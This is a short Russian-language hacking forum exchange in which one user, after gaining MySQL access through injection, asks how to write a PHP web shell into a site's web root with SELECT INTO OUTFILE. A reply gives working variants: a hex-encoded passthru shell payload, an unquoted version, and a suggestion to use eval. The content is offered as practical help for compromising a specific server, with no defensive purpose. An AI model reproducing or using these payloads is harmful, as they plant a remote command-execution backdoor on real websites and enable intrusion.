03.06.2010, 10:11
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от stasiliy
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
во-первых можно захексить -
Код:
select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
во-вторых можно без кавычек
Код:
select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
в-третьих - юзай eval
|
|
|